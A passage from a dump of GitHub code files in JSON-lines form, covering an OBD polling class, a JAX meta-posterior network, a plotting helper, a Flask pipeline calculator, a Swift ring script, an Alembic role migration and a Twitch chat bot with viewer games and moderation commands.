OBDResponse() # give it an initial value\n self.__callbacks[c] = [] # create an empty list\n\n # if a callback was given, push it\n if hasattr(callback, \"__call__\") and (callback not in self.__callbacks[c]):\n print(f\"subscribing callback for command: {str(c)}\")\n self.__callbacks[c].append(callback)\n\n def unwatch(self, c, callback=None):\n \"\"\"\n Unsubscribes a specific command (and optionally, a specific callback)\n from being updated. If no callback is specified, all callbacks for\n that command are dropped.\n \"\"\"\n\n # the dict shouldn't be changed while the daemon thread is iterating\n if self.__running:\n print(\"Can't unwatch() while running, please use stop()\")\n else:\n print(f\"Unwatching command: {str(c)}\")\n\n if c in self.__commands:\n # if a callback was specified, only remove the callback\n if hasattr(callback, \"__call__\") and (callback in self.__callbacks[c]):\n self.__callbacks[c].remove(callback)\n\n # if no more callbacks are left, remove the command entirely\n if len(self.__callbacks[c]) == 0:\n self.__commands.pop(c, None)\n else:\n # no callback was specified, pop everything\n self.__callbacks.pop(c, None)\n self.__commands.pop(c, None)\n\n def query(self, c, force=False):\n \"\"\"\n Non-blocking query().\n Only commands that have been watch()ed will return valid responses\n \"\"\"\n\n if c in self.__commands:\n return self.__commands[c]\n else:\n return OBDResponse()\n\n def run(self):\n \"\"\" Daemon thread \"\"\"\n\n # loop until the stop signal is received\n while self.__running:\n\n if len(self.__commands) > 0:\n # loop over the requested commands, send, and collect the response\n for c in self.__commands:\n\n # force, since commands are checked for support in watch()\n r = super(Async, self).query(c)\n\n # store the response\n self.__commands[c] = r\n\n # fire the callbacks, if there are any\n for callback in self.__callbacks[c]:\n callback(r)\n time.sleep(self.__delay_cmds)\n\n else:\n time.sleep(0.25) # idle","repo_name":"5g-mobility/car-communication","sub_path":"obd_emulator/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"31921024156","text":"\"\"\"Define Cubic Spline map for Variational Meta-Posteriors\"\"\"\n\nimport math\n\nimport haiku as hk\nimport jax\nfrom jax import numpy as jnp\n\nfrom modularbayes._src.typing import Array, List, Optional\n\n\nclass MLPVmpMap(hk.Module):\n \"\"\"Trainable mapping from eta to normalizing flow parameters.\"\"\"\n\n def __init__(\n self,\n params_flow_init: hk.Params,\n hidden_sizes: List[int],\n name: Optional[str] = None,\n ):\n super().__init__(name=name)\n\n # Variational parameters to be produced\n # Tree definition\n leaves, self.params_flow_treedef = jax.tree_util.tree_flatten(\n params_flow_init)\n self.params_flow_shapes = [x.shape for x in leaves]\n # Total number of output paramemters by the vmp\n self.output_dim = sum(x.flatten().shape[0] for x in leaves)\n\n self.hidden_sizes = hidden_sizes\n\n def __call__(self, eta: Array) -> List[hk.Params]:\n assert eta.ndim == 2\n\n num_eta_new, _ = eta.shape\n\n vmp_map = hk.Sequential([\n hk.Flatten(preserve_dims=-1),\n hk.nets.MLP(\n output_sizes=self.hidden_sizes,\n activate_final=True,\n ),\n hk.Linear(output_size=self.output_dim),\n ])\n flow_params_merged = jax.vmap(vmp_map)(eta)\n\n # out1 = hk.Flatten(preserve_dims=-1)(eta)\n # out1 = hk.nets.MLP(\n # self.hidden_sizes,\n # activate_final=True,\n # )(\n # out1)\n # out2 = hk.Flatten(preserve_dims=-1)(eta)\n # out2 = hk.nets.MLP(\n # self.hidden_sizes[-1:],\n # activate_final=True,\n # )(\n # out2)\n # flow_params_merged = hk.Linear(output_size=self.output_dim)(out1 + out2)\n\n leaves_eta = []\n for i in range(len(self.params_flow_shapes) - 1):\n param_i, flow_params_merged = jnp.split(\n flow_params_merged, (math.prod(self.params_flow_shapes[i]),), axis=-1)\n leaves_eta.append(\n param_i.reshape((num_eta_new,) + self.params_flow_shapes[i]))\n leaves_eta.append(\n flow_params_merged.reshape((num_eta_new,) +\n self.params_flow_shapes[-1]))\n\n params_flow_out = jax.tree_util.tree_unflatten(\n treedef=self.params_flow_treedef, leaves=leaves_eta)\n\n return params_flow_out\n","repo_name":"chriscarmona/modularbayes","sub_path":"modularbayes/_src/metaposterior/vmp_map.py","file_name":"vmp_map.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42102337831","text":"\"\"\"\nSA/plotter.py\n\nAuthor: Olivier Vadiavaloo\n\nDescription:\nThis module implements the plotter subclass for plotting the results\nof simulated annealing for a given game.\n\"\"\"\nfrom time import time\nfrom scipy.interpolate import interp1d\nimport src.Utils.plotter as base_plt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sb\nimport os\nfrom os.path import join\n\nclass Plotter(base_plt.Plotter):\n\n def parse_data(self, data_dict, three_dim):\n # assert len(data_dict) > 0, 'Empty data dictionary'\n if len(data_dict) == 0:\n X = np.array([])\n Y = np.array([])\n Z = np.array([])\n\n if three_dim:\n return X, Y, Z\n else:\n return X, Y\n\n score = []\n time = []\n iteration = []\n for iter, score_time_tuple in data_dict.items():\n score.append(score_time_tuple[0])\n time.append(score_time_tuple[1])\n iteration.append(iter)\n\n X, Y, Z = np.array(iteration), np.array(score), np.array(time)\n\n if three_dim:\n return X, Y, Z\n else:\n return X, Y\n\n def save_data(self, *data, names):\n DATA_DIR = 'data/'\n count = 0\n for data_dict in data:\n if not os.path.exists(DATA_DIR):\n os.makedirs(DATA_DIR)\n\n with open(join(DATA_DIR + names[count]), 'w') as data_file:\n data_file.write(f'# {names[count]}\\n')\n x, y, z = self.parse_data(data_dict, True)\n\n for i in range(len(y)):\n data_file.write(f'{x[i]} {y[i]} {z[i]}\\n')\n\n count += 1\n\n def plot_average_curve(self, paths_by_config):\n all_times, all_scores = self.parse_all_paths(paths_by_config)\n\n min_max_time = self.find_min_max_time(all_times)\n union_time, union_score, union_config_name = self.interpolate_all(min_max_time, all_times, all_scores)\n\n iter_frame = pd.DataFrame({'score': union_score, 'time': union_time, 'name': union_config_name})\n\n fig, ax = plt.subplots()\n sns_plot = sb.lineplot(x='time', y='score', hue='name', n_boot=1000,\n ci=70, style='name', markers=False, data=iter_frame)\n ax.set_ylabel('Score')\n ax.set_xlabel('Running Time (mins)')\n\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles=handles[0:], labels=labels[0:])\n\n plot_name = 'average_curve'\n sns_plot.get_figure().savefig(plot_name + '.png')\n plt.show()\n\n def interpolate_all(self, x_upper_bound, times_by_config, scores_by_config):\n union_time = []\n union_score = []\n union_config_name = []\n for config_name, scores_by_config_run in scores_by_config.items():\n for run_index, score in scores_by_config_run.items():\n x_range = np.linspace(0, x_upper_bound, num=100, endpoint=True)\n\n interpolated_function = interp1d(times_by_config[config_name][run_index], score)\n interpolated_scores = interpolated_function(x_range)\n\n union_time.extend(x_range)\n union_score.extend(interpolated_scores)\n union_config_name.extend([config_name for _ in range(len(x_range))])\n\n return union_time, union_score, union_config_name\n\n def find_min_max_time(self, all_times):\n max_times = []\n for times_by_config_run in all_times.values():\n for time in times_by_config_run.values():\n max_times.append(max(time))\n \n return min(max_times)\n\n def parse_all_paths(self, paths_by_config):\n all_scores = {}\n all_times = {}\n for config_name, paths_by_config_run in paths_by_config.items():\n all_scores[config_name] = {}\n all_times[config_name] = {} \n for run_index, path in paths_by_config_run.items():\n time, score = self.parse_dat_file(path)\n \n if time[0] != 0:\n time.insert(0, 0)\n score.insert(0, round(0.0, 2))\n\n time.append(running_time)\n best_overall_score = score[-1]\n score.append(best_overall_score)\n\n all_scores[config_name][run_index] = score\n all_times[config_name][run_index] = time\n\n print(all_times)\n print(all_scores)\n return all_times, all_scores\n\n def construct_dat_filenames(self, plot_filename):\n return {\n 'all_scores': 'all_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n 'best_scores': 'best_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n 'unoptimized_scores': 'unoptimized_scores_' + plot_filename.replace('graph', 'data') + '.dat',\n 'optimized_scores': 'optimized_scores_' + plot_filename.replace('graph', 'data') + '.dat'\n }\n\n def construct_paths_by_config(self, dat_filepaths_by_config):\n paths_by_config = {}\n for config in dat_filepaths_by_config:\n paths_by_config[config] = {}\n\n with open(config, 'r') as dat_filepaths_file:\n dat_filepaths = dat_filepaths_file.readlines()\n for run_index, dat_filepath in enumerate(dat_filepaths):\n paths_by_config[config][run_index] = dat_filepath\n\n return paths_by_config\n\n\n# if __name__ == '__main__':\n\n # running_time = INSERT RUNNING TIME\n # plotter = Plotter()\n\n # plot_names = {\n # 'x': 'Elapsed Time (mins)',\n # 'y': 'Program Score',\n # 'z': 'Iterations',\n # 'title': 'SA Program Scores vs Total Iterations',\n # 'filename': 'some_graph',\n # 'legend': ['all scores', 'unoptimized scores']\n # }\n \n # paths = []\n # paths.append(os.path.join('data/' + 'all_scores_no_opt_data.dat'))\n # paths.append(os.path.join('data/' + 'best_scores_unopt_vs_opt_data.dat'))\n # paths.append(os.path.join('data/' + 'unoptimized_scores_no_opt_data.dat'))\n # paths.append(os.path.join('data/' + 'optimized_scores_no_opt_data.dat'))\n\n # plotter.plot_from_file(paths, plot_names, same_fig=False, three_dim=False)\n\n # paths_by_config = {\n # INSERT PATHS TO DATA FILES BY CONFIG AND BY RUN INDEX\n # }\n\n # plotter.plot_average_curve(paths_by_config)","repo_name":"lelis-research/PyGames-synthesis","sub_path":"src/SA/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71692174324","text":"import sqlite3\r\nfrom pathlib import Path\r\n\r\n\r\ndef create_db(db_path: Path, init_script_path: Path):\r\n con = sqlite3.connect(db_path)\r\n cur = con.cursor()\r\n with open(init_script_path, \"r\") as f:\r\n text = f.read()\r\n cur.executescript(text)\r\n cur.close()\r\n con.close()\r\n","repo_name":"DashViolin/gb_pypatterns","sub_path":"wsgi_framework/architectural_system_patterns/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5350960654","text":"from werkzeug.datastructures import MultiDict\n\nfrom prepare import zip_form, wtcal_output\nfrom model import GeometryInput, MaterialInput, MetalLayer, LoadInput, \\\n SafetyClass, Other, CalWith, ImportFrom\nfrom compute import cal_pressure_containment, cal_collaps, \\\n cal_prop_buckling, cal_reeling\n\n\ndef home_page(flask):\n return flask.render_template(\"home.html\")\n\n\ndef wtcal_compute(flask):\n import_from = ImportFrom()\n\n geo = GeometryInput(flask.request.form)\n geo_fields = zip_form(geo)\n\n material = MaterialInput(flask.request.form)\n material_fields = zip_form(material)\n\n metal = MetalLayer(flask.request.form)\n metal_fields = zip_form(metal)\n\n load = LoadInput(flask.request.form)\n load_fields = zip_form(load)\n\n safety = SafetyClass(flask.request.form)\n safety_fields = zip_form(safety)\n\n other = Other(flask.request.form)\n other_fields = zip_form(other)\n\n cal_with_fields = CalWith(flask.request.form)\n\n if flask.request.method == 'POST':\n if geo.validate() and material.validate() and \\\n load.validate() and safety.validate():\n steel_outer_diameter = geo.steel_outer_diameter.data\n corrosion_allowance = geo.corrosion_allowance.data\n\n fabrication_method = material.fabrication_method.data\n pipe_material = material.pipe_material.data\n max_design_temperature = material.max_design_temperature.data\n supplimentary_d_fulfilled = material.supplimentary_d_fulfilled.data\n supplimentary_u_fulfilled = material.supplimentary_u_fulfilled.data\n\n any_inner_metal_layer = metal.any_inner_metal_layer.data\n cladded_or_lined = metal.cladded_or_lined.data\n metal_layer_type = metal.metal_layer_type.data\n\n design_pressure = load.design_pressure.data\n level = load.level.data\n max_contents_density = load.max_contents_density.data\n water_depth_for_bursting = load.water_depth_for_bursting.data\n water_depth_for_collapse_and_prop_buckling = load.water_depth_for_collapse_and_prop_buckling.data\n sea_water_density = load.sea_water_density.data\n\n contents_type = safety.contents_type.data\n operation_zone = safety.operation_zone.data\n\n # Example Other\n example_param_float = other.example_param_float.data\n example_param_select = other.example_param_select.data\n\n pressure_containment = cal_with_fields.pressure_containment.data\n collaps = cal_with_fields.collaps.data\n propgation_buckling = cal_with_fields.propgation_buckling.data\n reeling_screening_check = cal_with_fields.reeling_screening_check.data\n vessel = cal_with_fields.vessel.data\n\n r1, r2, r3, r4 = 0, 0, 0, 0\n\n if pressure_containment is True:\n r1 = cal_pressure_containment(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n design_pressure,\n level,\n max_contents_density,\n sea_water_density,\n water_depth_for_bursting,\n contents_type,\n operation_zone)\n if collaps is True:\n r2 = cal_collaps(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n sea_water_density,\n water_depth_for_collapse_and_prop_buckling,\n contents_type,\n operation_zone)\n if propgation_buckling is True:\n r3 = cal_prop_buckling(steel_outer_diameter,\n corrosion_allowance,\n fabrication_method,\n pipe_material,\n max_design_temperature,\n supplimentary_d_fulfilled,\n supplimentary_u_fulfilled,\n sea_water_density,\n water_depth_for_collapse_and_prop_buckling,\n contents_type,\n operation_zone)\n if reeling_screening_check is True:\n r4 = cal_reeling(steel_outer_diameter,\n fabrication_method,\n vessel,\n any_inner_metal_layer,\n cladded_or_lined)\n\n result = wtcal_output(r1=r1, r2=r2, r3=r3, r4=r4)\n return flask.jsonify({\"result\": result})\n else:\n return flask.jsonify({\"result\": \"Please Fill In Blanks With Valid Values.\"})\n\n return flask.render_template(\"wtcal.html\",\n import_from=import_from,\n geo_fields=geo_fields,\n material_fields=material_fields,\n metal_fields=metal_fields,\n load_fields=load_fields,\n safety_fields=safety_fields,\n other_fields=other_fields,\n cal_with_fields=cal_with_fields)\n","repo_name":"luyuqing/subsea_to_cloud","sub_path":"decision_logic.py","file_name":"decision_logic.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"158997031","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pprint import pprint\nfrom swift.common.ring import Ring\n\n\nservers = (\"account\", \"container\", \"object\")\nfor server in servers:\n ring = Ring('/etc/swift/%s.ring.gz' % server)\n print(server)\n pprint(ring._devs)\n ip_ports = set()\n for dev in ring.devs:\n if dev:\n ip_ports.add((dev['region'], dev['zone'],\n dev['ip'], dev['port']))\n \n pprint(ip_ports)\n \n# the ring is now object Ring \nprint(ring.partition_count, ring.replica_count)\n\n\n# Partition Assignment List, \n# This is a list of array(¡®H¡¯) of devices ids. The outermost list contains an array(¡®H¡¯) for each replica. \n# Each array(¡®H¡¯) has a length equal to the partition count for the ring. \n# Each integer in the array(¡®H¡¯) is an index into the above list of devices. \n# The partition list is known internally to the Ring class as _replica2part2dev_id.\n\nfor replica in xrange(ring.replica_count):\n print(\"Replica %d:\" % replica)\n #print(len(ring._replica2part2dev_id[replica]), ring._replica2part2dev_id[replica])\n \n\nfor partition in xrange(ring.partition_count): \n devices = [ring.devs[part2dev_id[partition]] for part2dev_id in ring._replica2part2dev_id]\n #pprint(devices)\n \n \n# Partition Shift Value\n# The partition shift value is known internally to the Ring class as _part_shift. \n# This value used to shift an MD5 hash to calculate the partition on which the data for that hash should reside\n# Only the top four bytes of the hash is used in this process\nfrom hashlib import md5\nfrom struct import unpack_from\n\npaths = [\"AUTH_d4d0fdacde194128bfc90f2f8c2dae8a\"]\npaths.append(\"foo\")\npaths.append(\"test.py\")\nHASH_PATH_PREFIX = HASH_PATH_SUFFIX = \"deepgully\"\ndigest = md5(HASH_PATH_PREFIX + '/' + '/'.join(paths) + HASH_PATH_SUFFIX).digest()\npartition = unpack_from('>I', digest)[0] >> ring._part_shift\nprint(partition)\n\n\n# Building the Ring\n# 1. The initial building of the ring first calculates the number of partitions that should ideally be assigned \n# to each device based the device¡¯s weight\n# 2. Then, the ring builder assigns each replica of each partition to the device that desires the most partitions\n# at that point while keeping it as far away as possible from other replicas\n ","repo_name":"deepgully/codes","sub_path":"swift/ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"125151448","text":"\"\"\"Redo roles scopes mapping\n\nRevision ID: 9f38dad37628\nRevises: eb1e6ec39b83\nCreate Date: 2023-03-03 16:53:03.553992\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy import text\nfrom sqlalchemy.engine import ResultProxy\n\nrevision = \"9f38dad37628\"\ndown_revision = \"eb1e6ec39b83\"\nbranch_labels = None\ndepends_on = None\n\n\ndef swap_roles(old_role: str, new_role: str):\n bind = op.get_bind()\n matched_rows: ResultProxy = bind.execute(\n text(\"SELECT * FROM fidesuserpermissions WHERE :old_role = ANY(roles);\"),\n {\"old_role\": old_role},\n )\n for row in matched_rows:\n current_roles = row[\"roles\"]\n current_roles.remove(old_role)\n current_roles.append(new_role)\n bind.execute(\n text(\"UPDATE fidesuserpermissions SET roles= :roles WHERE id= :id\"),\n {\"roles\": sorted(list(set(current_roles))), \"id\": row[\"id\"]},\n )\n\n matched_client_rows: ResultProxy = bind.execute(\n text(\"SELECT * FROM client WHERE :old_role = ANY(roles);\"),\n {\"old_role\": old_role},\n )\n for row in matched_client_rows:\n client_roles = row[\"roles\"]\n client_roles.remove(old_role)\n client_roles.append(new_role)\n bind.execute(\n text(\"UPDATE client SET roles= :roles WHERE id= :id\"),\n {\"roles\": sorted(list(set(client_roles))), \"id\": row[\"id\"]},\n )\n\n\ndef upgrade():\n swap_roles(\"admin\", \"owner\")\n swap_roles(\"viewer_and_privacy_request_manager\", \"viewer_and_approver\")\n swap_roles(\"privacy_request_manager\", \"approver\")\n\n\ndef downgrade():\n swap_roles(\"owner\", \"admin\")\n swap_roles(\"viewer_and_approver\", \"viewer_and_privacy_request_manager\")\n swap_roles(\"approver\", \"privacy_request_manager\")\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/alembic/migrations/versions/9f38dad37628_redo_roles_scopes_mapping.py","file_name":"9f38dad37628_redo_roles_scopes_mapping.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"71456104244","text":"from collections import defaultdict\nclass TimeMap:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.dictstore = defaultdict(list)\n\n def set(self, key: str, value: str, timestamp: int) -> None:\n self.dictstore[key].append((timestamp,value))\n return None\n\n def get(self, key: str, timestamp: int) -> str:\n valuelist = self.dictstore[key]\n l = 0\n r = len(valuelist)\n while l < r:\n m = l+(r-l)//2\n if valuelist[m][0]>timestamp:\n r = m\n else:\n l = m+1\n return \"\" if l == 0 else valuelist[l-1][1]\n\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)","repo_name":"cccccccccccccc/Myleetcode","sub_path":"981/Time Based Key-Value Store.py","file_name":"Time Based Key-Value Store.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1580503460","text":"import configparser\nimport pygame\nimport time\nimport sys\nfrom twitchio.ext import commands\nfrom threading import Thread\nfrom Character import Character\nfrom Clod import Clod\nimport database\nimport twitch_api\n\nconfig = configparser.ConfigParser()\nconfig.read('settings.ini')\nclient_id = config['Twitch']['client_id']\nclient_secret = config['Twitch']['client_secret']\naccess_token = config['Twitch']['access_token']\ntoken_oauth = config['Twitch']['token_oauth']\n\n\n# def get_chatters():\n# \"\"\"\n# Gets list of viewers from chat.\n# \"\"\"\n# header = {\n# 'Authorization': f'Bearer {access_token}',\n# 'Client-Id': client_id,\n# }\n# respond = requests.get('https://tmi.twitch.tv/group/user/pianoparrot/chatters', headers=header)\n# return respond.json()['chatters']['viewers'] + respond.json()['chatters']['moderators'] + ['pianoparrot']\n\n\nbot = commands.Bot(\n token=token_oauth,\n client_id=client_id,\n client_secret=client_secret,\n prefix='!',\n initial_channels=['pianoparrot']\n)\n\n\n@bot.event\nasync def event_message(ctx):\n await bot.handle_commands(ctx)\n\n\n@bot.command(name='test')\nasync def test_command(ctx):\n \"\"\"\n Testing function.\n \"\"\"\n print(ctx.message.raw_data)\n print(ctx.message.content)\n print(ctx.message.content[ctx.message.content.find(' ') + 1:])\n print(ctx.message.author)\n print(ctx.message.echo)\n print(ctx.message.timestamp)\n print(ctx.message.tags)\n print(ctx.message.tags['display-name'])\n print(ctx.message.channel)\n print(ctx.message.id)\n text = ctx.message.content.split(' ', maxsplit=2)\n if len(text) >= 2:\n print(text[1])\n if len(text) == 3:\n print(text[2])\n await ctx.send('this is a test response')\n\n\n@bot.command(name='lurk')\nasync def new_lurker(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name in [lurker.name for lurker in Character.lurking_list]:\n await ctx.send(f\"Hey {user_name}, you are already lurking :-)\")\n\n elif not any(Character.positions.values()):\n await ctx.send(f\"I'm sorry {user_name}, but there are no free seats :-(\")\n\n else:\n if database.check_users(user_name):\n Character(user_name, screen, database.get_points(user_name))\n else:\n database.insert_user(user_name)\n Character(user_name, screen)\n await ctx.send(f\"{user_name} is now lurking\")\n\n\n@bot.command(name='wave')\nasync def lurker_wave(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.wave_update()\n\n\n@bot.command(name='clap')\nasync def lurker_clap(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.clap_update()\n\n\n@bot.command(name='leave')\nasync def lurker_leave(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name not in [lurker.name for lurker in Character.lurking_list]:\n await ctx.send(f\"Hey {user_name}, you were not lurking :-)\")\n\n else:\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0 and not any(lurker.all_animations):\n lurker.leave_update()\n await ctx.send(f\"{user_name} has left the lurking place\")\n\n\n@bot.command(name='clod')\nasync def clod(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0:\n if lurker.points >= 10:\n lurker.get_a_clod()\n await ctx.send(f\"{user_name}, you've got a clod, now you can throw it! -10 points\")\n else:\n await ctx.send(f\"{user_name}, you need at least 10 points to purchase the clod :-)\")\n\n\n@bot.command(name='numclods')\nasync def clods(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0:\n await ctx.send(f\"{user_name}, you have {lurker.clod_amount} clod\"+(f\"s\"*(lurker.clod_amount != 1)))\n\n\n@bot.command(name='throw')\nasync def throw(ctx):\n user_name = ctx.message.tags['display-name']\n target = ctx.message.content[ctx.message.content.find(' ') + 1:]\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name and lurker.position <= 0 and not any(lurker.all_animations):\n if lurker.clod_amount > 0:\n for aim in Character.lurking_list:\n if aim.name.lower() == target.lower() and aim.position <= 0:\n lurker.throw_update(aim.seat_point)\n else:\n await ctx.send(f\"{user_name}, you have no clods to throw :-(\")\n\n\n@bot.command(name='catch')\nasync def catch(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n lurker.catch_update()\n\n\n@bot.command(name='points')\nasync def lurker_points(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n await ctx.send(f\"Your points: {lurker.points}\")\n\n\n@bot.command(name='get_vip_for_a_week')\nasync def get_vip_for_a_week(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= 300:\n if user_name not in twitch_api.get_vip_list():\n status = lurker.get_vip_status()\n if status and status != 422:\n await ctx.send(f\"{user_name} purchased VIP status! :O -300 points\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"Hey {user_name}, you already have VIP status :\\\\\")\n else:\n await ctx.send(f\"Hey {user_name}, you are too poor :D You need to have 300 points for this\")\n\n\n@bot.command(name='remove_vip_status')\nasync def remove_vip_status(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if user_name in twitch_api.get_vip_list():\n status = lurker.lose_vip_status()\n if status and status != 422:\n await ctx.send(f\"You've been kicked out of the VIP room! :|\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"Hey {user_name}, you are just a regular :D\")\n\n\n@bot.command(name='timeout')\nasync def timeout(ctx):\n target = None\n reason = None\n\n user_name = ctx.message.tags['display-name']\n text = ctx.message.content.split(' ', maxsplit=2)\n\n if len(text) >= 2:\n target = text[1].lower()\n if len(text) >= 3:\n reason = text[2]\n\n if target:\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= 100:\n if target == 'pianoparrot':\n await ctx.send(f\"Haha :D Do not even think about it :\\\\\")\n elif target in ['kindredspirits7', 'dilecula', 'amanrosse', 'haarolean']:\n await ctx.send(f\"That was brave, {user_name} B) But no :D \")\n elif target in ['donationalerts_', 'moobot', 'restreambot', 'songlistbot', 'streamelements']:\n await ctx.send(f\"Really? They're not even human :\\\\\")\n elif target in twitch_api.get_list_of_banned_users():\n await ctx.send(f\"{user_name}, somebody already banned {target} :D\")\n else:\n status = lurker.give_timeout(target, reason if reason else None)\n if status and target == lurker.name:\n await ctx.send(f\"Good job, {user_name}, you banned yourself :D -100 points\")\n elif status:\n await ctx.send(f\"{user_name} just banned {target} :O -100 points\")\n else:\n await ctx.send(f\"Sorry {user_name}, something went wrong :\\\\ Try again in a few seconds\")\n else:\n await ctx.send(f\"{user_name}, you need at least 100 points to use such power B)\")\n \n \n@bot.command(name='play')\nasync def play(ctx):\n user_name = ctx.message.tags['display-name']\n bet = ctx.message.content[ctx.message.content.find(' ') + 1:]\n \n if bet.isdigit() and int(bet) > 0:\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n if lurker.points >= int(bet):\n lurker.ready_to_play(bet)\n await ctx.send(f\"{user_name} wants to play for {bet} point{'s' if int(bet) > 1 else ''} B) Who will accept the challenge?\")\n else:\n await ctx.send(f\"{user_name}, you don't have enough points for this bet :\\\\\")\n\n\n@bot.command(name='accept')\nasync def accept(ctx):\n user_name = ctx.message.tags['display-name']\n\n for lurker in Character.lurking_list:\n if lurker.name == user_name:\n for target in Character.lurking_list:\n if target.calling_for_play and target.name != lurker.name:\n if lurker.points >= target.bet:\n await ctx.send(f\"{target.name}'s challenge is accepted by {lurker.name} :O\")\n status = lurker.play_round(target, target.bet)\n await ctx.send(f\"{user_name} threw {lurker.pick.upper()} and {target.name} threw {target.pick.upper()}\")\n if status:\n await ctx.send(f\"{user_name} won and got {target.bet} point{'s' if target.bet > 1 else ''}! B)\")\n elif status is None:\n await ctx.send(f\"DRAW!\")\n else:\n await ctx.send(f\"{target.name} won and got {target.bet} point{'s' if target.bet > 1 else ''}! B)\")\n else:\n await ctx.send(f\"{user_name}, you don't have enough points to accept the challenge :(\")\n\n\n@bot.command(name='leave_all')\nasync def lurker_leave(ctx):\n user_name = ctx.message.tags['display-name']\n\n if user_name == 'PianoParrot':\n for lurker in Character.lurking_list:\n if lurker.position <= 0 and not any(lurker.all_animations):\n lurker.leave_update()\n\n\n@bot.command(name='com_list')\nasync def com_list(ctx):\n await ctx.send(f\"Commands are available: !lurk, !leave, !wave, !clap, !clod, !numclods, !throw username, !catch, !points, !get_vip_for_a_week, !remove_vip_status, !timeout username reason(optional), !lurkers\")\n\n\n@bot.command(name='lurkers')\nasync def all_lurkers_list(ctx):\n if Character.lurking_list:\n await ctx.send(f\"Lurking: {Character.show_lurkers()}\")\n\n else:\n await ctx.send(\"Nobody is lurking now...\")\n\n\ndef checking():\n global past_time\n past_time = time.time()\n current_viewers = twitch_api.get_chatters()\n for lurker in Character.lurking_list:\n if lurker.name.lower() not in current_viewers:\n lurker.leave_update()\n\n\ndef vip_expired():\n all_vip_users = twitch_api.get_vip_list()\n for user in all_vip_users:\n vip_time = database.get_vip_time(user)\n if vip_time and vip_time + 604800 < time.time():\n username_id = twitch_api.get_user_id(user.lower())\n twitch_api.remove_vip_status(username_id)\n\n\nif __name__ == '__main__':\n vip_expired()\n t1 = Thread(target=bot.run)\n t1.start()\n pygame.init()\n screen = pygame.display.set_mode((1920, 1080))\n pygame.display.set_caption('twitch_app')\n bg_color = (0, 255, 0)\n\n past_time = time.time() # start time\n\n while True:\n if time.time() >= past_time + 1200: # if 20 minutes has passed, checks if lurkers are still watching\n t2 = Thread(target=checking)\n t2.start()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(bg_color)\n if Character.lurking_list:\n [clod.fly() for clod in Clod.clod_list]\n [(lurker.move(), lurker.chair_puff(), lurker.wave(), lurker.clap(), lurker.points_gain(),\n lurker.clod_collision(), lurker.throw(), lurker.catch(), lurker.caught(),\n lurker.ouch()) for lurker in Character.lurking_list]\n [lurker.leave() for lurker in Character.lurking_list]\n pygame.display.update()\n pygame.time.delay(40)\n","repo_name":"Nilumilak/Twitch_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 